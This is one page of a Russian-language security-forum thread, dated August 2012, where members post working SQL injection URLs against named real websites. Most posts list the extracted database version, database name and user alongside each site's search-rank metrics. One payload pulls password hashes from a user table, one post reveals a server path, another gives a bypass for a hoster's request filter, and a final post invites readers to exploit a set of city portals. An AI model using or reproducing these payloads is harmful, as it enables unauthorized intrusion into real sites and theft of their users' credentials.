HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1519 из 1604 « Первая < 5191019141914691509 1515 1516 1517 1518 1519 1520 1521 1522 1523 15291569 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15181  
Старый 05.08.2012, 13:41
Unknown
Guest
Сообщений: n/a
Провел на форуме:
9763

Репутация: 8
По умолчанию
MySQL: GET SQLi in param 'id' in URL:http://orgasmof.ru

Код:
Code:
http://orgasmof.ru/?id=1%27%20AND%20%28SELECT%203101%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6473763a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a6d68743a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27YQPM%27=%27YQPM
user(): orgasm@localhost

version(): 5.1.49-3
 
Ответить с цитированием

  #15182  
Старый 05.08.2012, 21:30
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию
Философский портал.

Код:
Code:
http://arcto.ru/modules.php?name=News&file=print&sid=1-1.1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),2,3,4,5,6--
Database Version: 5.1.63

Database name: arctogaia

User name: arctogaia@web.evrazia.org

ТИЦ: 325

PR: 5
 
Ответить с цитированием

  #15183  
Старый 06.08.2012, 21:03
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
Что-то тихо тут...

PR=6

CY=30

Цитата:
Сообщение от None  
http://www.scripts.com/index.php?option=com_user&task=UserDetails&Returni d=1&Itemid=1'+and(select+1+from(select+count(*),co ncat((select+(select+(select+concat(0x3c68313e,0x2 7,unhex(Hex(cast(dev_metatags.id+as+char))),0x3a,u nhex(Hex(cast(dev_metatags.option+as+char))),0x27, 0x3c2f68313e)+from+scripts.dev_metatags+limit+0,1) +)+from+information_schema.tables+limit+0,1),floor (rand(0)*2))x+from+information_schema.tables+group +by+x)a)+and+'1'='1
 
Ответить с цитированием

  #15184  
Старый 07.08.2012, 01:43
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию
Товары почтой.

Код:
Code:
http://zacaz.com/products.php?news_id=1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
Вывод в meta.

Database Version: 5.1.63-log

Database name: torgpost_db

User name: torgpost_db@91.206.200.70

ТИЦ: 30

PR: 3

Блого-хостинг.

Код:
Code:
http://www.yesblog.ru/blog.php?user=onlinepburriigri&note=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9--
Вывод в title.

Database Version: 5.0.92

Database name: blogsua_yesblog

User name: blogsua_yesblog@localhost

ТИЦ: 40

PR: 2
 
Ответить с цитированием

  #15185  
Старый 07.08.2012, 01:52
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
http://www._photoline.ru/


6-7 К трафа

Цитата:
Сообщение от None  
http://www.photoline.ru/cgi-bin/cr/info1.pl?ind=-8546%20UNION%20ALL%20SELECT%20null,%20null,%20null ,%20null,CHR%2865%29||CHR%28110%29||CHR%28116%29|| CHR%28105%29||CHR%2897%29||CHR%28116%29||CHR%2846% 29||CHR%28114%29||CHR%28117%29,%20null,%20null,%20 null,%20null,%20null,%20null,%20null,%20null,%20nu ll,%20null--
пробелы убрать
 
Ответить с цитированием

  #15186  
Старый 07.08.2012, 18:23
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
Ранее я уже публиковал скулю на private, однако админы это дело отремонтировали, но на место старой приходит две новые...

Цитата:
Сообщение от None  
http://www.private.com/movies/Sex-Slaves-And-FairyTails/999999999+union+select+1,concat_ws%280x3a,table_na me%29,3+from+information_schema.tables+limit+29,1--
 
Ответить с цитированием

  #15187  
Старый 07.08.2012, 18:50
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию
Газета о жилом и коммерческом фонде.

Код:
Code:
http://www.konserg.ru/index.php?category_id=1+UNION+SELECT+1,2,3,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),5,6,7,8,9,10,11,12,13,14,15,16,17--
information_schema не вывести т.к. хостер - sweb.ru фильтрует запросы и редиректит на sweb.ru/insecure

Database Version: 5.1.58-log

Database name: konsergru_kon

User name: konsergru_kon@localhost

ТИЦ: 180

PR: 4
 
Ответить с цитированием

  #15188  
Старый 07.08.2012, 19:51
\/IRUS
Guest
Сообщений: n/a
Провел на форуме:
118953

Репутация: 37
По умолчанию
ТМ FreeMarket.ua

FreeMarket.ua - цены на компьютеры, мобильные телефоны, бытовую технику, недвижимость, автомобили и многое другое.

Яндекс тИЦ (CY): 2500

Google PageRank (PR): 6

Alexa Rank: 48,503

MySQL, Error-Based Duplicate entry SQLi

Код:
Code:
http://freemarket.ua/today.xml?page=1'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/passwd/**/from/**/t_user/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
5.0.92-log

freesell_new@193.33.212.14

+

раскрытие путей:

Код:
Code:
/var/www/freesell/data/www/freemarket.kiev.ua/inc/freemarket.inc.php
шелл не лил
 
Ответить с цитированием

  #15189  
Старый 07.08.2012, 20:13
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию
Цитата:
Сообщение от HellFire  
HellFire said:
information_schema не вывести т.к. хостер - sweb.ru фильтрует запросы и редиректит на sweb.ru/insecure
на будущее

Цитата:
Сообщение от None  
http://www.konserg.ru/index.php?category_id=-1+UNION%0d%0aSELECT+1,2,3,table_name,5,6,7,8,9,10, 11,12,13,14,15,16,17+from+information_schema.table s+--+
пробелы ток убери.
 
Ответить с цитированием

  #15190  
Старый 08.08.2012, 20:52
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
С болью на сердце и злобой на сисадминов выкладываю эти скули. Работал в сотрудничащей фирме, позвонил им в 2010 году и сообщил про уязвимости в движке, буквально ткнул носом.

Сказали, да-да, всё исправим...

Two years later... А воз и ныне там...

Сайт web-gorod.net

Код:
Code:
_ttp://web-gorod.net/index.php?id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
5.5.3-55

DB = pzdobnin_wg

Таблица с админами = userlist

Сайт web-gorod-brn.ru

Код:
Code:
_ttp://web-gorod-brn.ru/view_post.php?cat=16&id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
5.1.50-lk-log

DB = webgorodru

Таблица с админами = userlist

На главном сайте ещё куча всяких городов... Разбирайте.

Пассы в plain-text
 
Ответить с цитированием
Ответ
Страница 1519 из 1604 « Первая < 5191019141914691509 1515 1516 1517 1518 1519 1520 1521 1522 1523 15291569 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ